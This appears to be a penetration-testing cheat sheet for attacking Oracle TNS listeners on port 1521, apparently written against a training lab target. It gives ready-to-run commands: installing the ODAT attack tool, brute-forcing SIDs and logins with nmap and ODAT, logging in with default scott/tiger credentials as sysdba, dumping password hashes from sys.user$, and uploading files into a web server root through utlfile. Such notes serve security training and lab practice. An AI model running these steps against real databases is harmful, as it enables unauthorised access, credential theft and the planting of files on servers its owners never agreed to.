Oracle TNS (1521)
Oracle-Tools-setup.sh
#!/bin/bash
sudo apt-get install libaio1 python3-dev alien python3-pip -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
sudo submodule update
sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcompleteTesting ODAT (Oracle Database Attacking Tool)
./odat.py -hFootprinting using NMAP
sudo nmap -p1521 -sV 10.129.204.235 --openSID (System Identifier)
unique name that identifies a particular database instance
essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to
If the client specifies an incorrect SID, the connection attempt will fail.
Bruteforcing SID using NMAP
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-bruteODAT (run all modules i.e. brute sid and user/pass)
./odat.py all -s 10.129.204.235Logging in using SQLPlus
sqlplus scott/tiger@10.129.204.235/XE;Logging in using SQLPlus as sysdba (if user has appropriate privs)
sqlplus scott/tiger@10.129.204.235/XE as sysdbaIf SQLPlus shows error about libsqlplus.so
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig
Oracle RDBMS Commands
select table_name from all_tables;
select * from user_role_privs;Oracle RDBMS Extracting Password Hashes
select name, password from sys.user$Oracle RDBMS file upload (INTO OUTFILE)
$ echo "Oracle File Upload Test" > testing.txt
$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
$ curl -X GET http://10.129.204.235/testing.txt/var/www/html for linux
C:\inetpub\wwwroot for windows
Try this only if there is a webserver
Last updated